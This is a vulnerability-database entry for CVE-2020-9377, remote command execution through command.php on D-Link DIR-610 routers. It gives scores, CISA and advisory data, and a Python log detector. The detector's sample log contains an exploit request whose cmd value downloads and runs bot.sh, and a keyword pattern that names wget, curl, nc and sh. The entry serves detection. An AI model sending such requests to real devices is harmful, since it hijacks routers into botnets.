CVE-2020-9377
Published 2020-07-09
Priority P1 · 84 · CVSS 3.1 8.8 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CISA Known Exploited Vulnerability (KEV), remediation due 2022-04-15
Exploited in the wild (ITW)
EPSS: 21.34% (97.3rd percentile)
D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
Detection & IOCs (extracted from sources)
- Monitor HTTP requests targeting command.php on D-Link DIR-610 devices, specifically inspecting the cmd parameter for shell command injection payloads.
- Any inbound request to command.php with a populated cmd parameter should be treated as a high-confidence exploitation attempt against CVE-2020-9377.
- This vulnerability only affects D-Link DIR-610 devices, which are end-of-life and no longer supported by the maintainer. Detection efforts should be scoped accordingly.
- CISA flags this as a Known Exploited Vulnerability (KEV), indicating active in-the-wild exploitation. Any DIR-610 still in use should be treated as a critical-risk asset.
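The detection guidance above, turned into working logic. This is an added example, not code from any of the cited sources: it parses Apache/nginx combined-format access lines (the sample lines are constructed, with 203.0.113.10 from the documentation address range), flags every request to command.php that carries a populated cmd parameter, and separately handles the case a plain access log cannot resolve, a POST whose body was never logged. The keyword list in SHELL_HINTS is an enrichment heuristic of my own, not a vendor signature.

```python
"""Flag requests matching the CVE-2020-9377 pattern: any request to command.php
whose cmd parameter is populated. Added example, not from any cited source; the
access-log lines are constructed and follow the Apache/nginx "combined" format."""
import re
from urllib.parse import parse_qs, urlsplit

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)

# Heuristic enrichment only: the page's guidance treats a populated cmd as a hit
# regardless of content. The keyword list is an assumption, not a vendor signature.
SHELL_HINTS = re.compile(r"[;&|`$<>]|\b(?:wget|curl|tftp|busybox|nc|chmod|sh)\b", re.I)


def cmd_param(target, body=None):
    """Return (targets_command_php, cmd_value); cmd_value is None when absent."""
    parts = urlsplit(target)
    if parts.path.lower().rsplit("/", 1)[-1] != "command.php":
        return False, None
    # separator="&" so a ';' inside the payload is not treated as a field separator.
    params = parse_qs(parts.query, keep_blank_values=True, separator="&")
    if body:
        for key, vals in parse_qs(body, keep_blank_values=True, separator="&").items():
            params.setdefault(key, []).extend(vals)
    vals = params.get("cmd")
    return True, (vals[0] if vals else None)


def assess(method, target, body=None):
    """Classify one request; returns None when command.php is not involved."""
    hit, cmd = cmd_param(target, body)
    if not hit:
        return None
    if cmd is None:
        # Access logs never carry POST bodies, so a POST to command.php cannot be
        # confirmed here; hand it to a proxy/WAF log that has the body.
        reason = "POST body not logged" if method == "POST" and body is None else "no cmd parameter"
        return {"verdict": "review", "cmd": None, "reason": reason}
    if not cmd.strip():
        return {"verdict": "review", "cmd": cmd, "reason": "empty cmd parameter"}
    indicators = ["populated cmd parameter"]
    if SHELL_HINTS.search(cmd):
        indicators.append("shell metacharacters or download/exec tooling")
    return {"verdict": "exploitation-attempt", "cmd": cmd, "indicators": indicators}


def scan_log(lines):
    """Run assess() over combined-format lines; returns the list of findings."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        result = assess(m["method"], m["target"])
        if result:
            result.update(ip=m["ip"], ts=m["ts"], method=m["method"], ua=m["ua"])
            findings.append(result)
    return findings


# Constructed sample traffic (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Mar/2022:10:15:32 +0000] "GET /command.php?cmd=cd%20/tmp;wget%20http://203.0.113.10/bot.sh;sh%20bot.sh HTTP/1.1" 200 64 "-" "Go-http-client/1.1"',
    '10.0.0.7 - - [25/Mar/2022:10:16:01 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [25/Mar/2022:10:17:45 +0000] "POST /command.php HTTP/1.1" 200 64 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The GET line is reported as an exploitation attempt with the decoded command; the POST line is reported for review rather than dismissed, because the verdict depends on a body the access log does not contain. Run the same assess() against a proxy or WAF log that keeps request bodies to close that gap.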
CVSS provenance
- NVD, v3.1: 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- NVD, v2.0: 6.5 MEDIUM, AV:N/AC:L/Au:S/C:P/I:P/A:P
- VulnCheck: 8.8 HIGH
- CISA: 8.8 HIGH
CISA
D-Link DIR-610 Devices Remote Command Execution
Source: CISA KEV · added 2022-03-25 · CVSS 8.8 (HIGH) · CWE-78
Vulnerability: D-Link DIR-610 Devices Remote Command Execution
Affected: D-Link DIR-610 Devices
D-Link DIR-610 devices allow remote code execution via the cmd parameter to command.php.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-9377
Remediation Due Date: 2022-04-15
GHSA
GHSA-mvq3-fgc2-44m7 · ghsa_unreviewed · 2022-05-24 · MEDIUM · CWE-78
** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
VulnCheck
D-Link DIR-610 Devices Remote Command Execution
Source: VulnCheck · 2020 · CVSS 8.8 (HIGH) · CWE-78
D-Link DIR-610 devices allow remote code execution via the cmd parameter to command.php.
Affected: D-Link DIR-610 Devices
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Exploitation References:
- https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits
- https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github
- https://www.fortiguard.com/threat-signal-report/4389/botenago-malware-targets-multiple-iot-devices
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://dashboard.shadowserver.org/
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
References
- https://gist.github.com/GouveaHeitor/131557f9de7d571f118f59805df852dc
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
- https://www.dlink.com.br/produto/dir-610/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-9377
Timeline
- 2020-07-09: Published
- 2022-03-25: Added to CISA KEV
- Exploited in the wild